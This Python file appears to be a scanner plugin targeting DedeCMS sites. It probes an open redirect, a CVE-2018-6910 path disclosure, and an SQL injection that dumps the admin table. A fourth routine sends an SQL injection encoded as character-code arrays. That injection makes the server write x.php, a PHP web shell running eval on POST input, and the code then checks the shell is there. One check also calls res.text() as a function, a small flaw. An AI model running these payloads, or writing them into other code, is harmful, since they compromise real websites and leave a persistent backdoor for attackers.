#!/usr/bin python
from plugins.config.config_package import *


class DedeCMS(object):
    def dedecms_url_redirection(url):
        path = 'plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D'
        res = core.get(url,path)
        if res.status_code == 200 and 'baidu.com' in res.text:
            core.checksuc(target=url,name='DedeCMS URL重定向',payload='plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D')
        else:
            pass
    
    def check_CVE_2018_6910(url):
        path = 'include/downmix.inc.php'
        res = core.get(url,path)
        if res.status_code == 200 and '/www/wwwroot/' in res.text:
            core.checksuc(target=url,name='CVE-2018-6910 DedeCMS信息泄露',payload='include/downmix.inc.php')
        else:
            pass
    
    def advancedsearch_sqli(url):
        try:
            headers = {
                "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
            }
            payload = "plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin"
            res = requests.get(url+payload,headers=headers,verify=False,timeout=2)
            if res.status_code == 200 and r"admin" in res.text():
                core.checksuc(target=url,name='advancedsearch_sqli',payload='plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin')   
            else:
                pass
        except Exception as e:
            pass
        except KeyboardInterrupt:
            sys.exit()

    def dedesql_class_sqli(url):
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = 'plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1['\
            ']=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]'\
            '=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]'\
            '=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&a'\
            'rrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&a'\
            'rrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2'\
            '[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2'\
            '[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2'\
            '[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2['\
            ']=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]='\
            '120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44'\
            '&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&ar'\
            'rs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2'\
            '[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93'\
            '&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2'\
            '[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2['\
            ']=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]='\
            '87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arr'\
            's2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]'\
            '=35'
        try:
            res =requests.get(url+payload,headers=headers,verify=False,timeout=2)
            if res.status_code == 200:
                msql = requests.get(url=url + '/plus/x.php',headers=headers)
                if msql.status_code == 200:
                    core.checksuc(target=url,name='dedesql_class_sqli',payload=None)
            else:
                pass
        except Exception as e:
            pass
        except KeyboardInterrupt:
            sys.exit()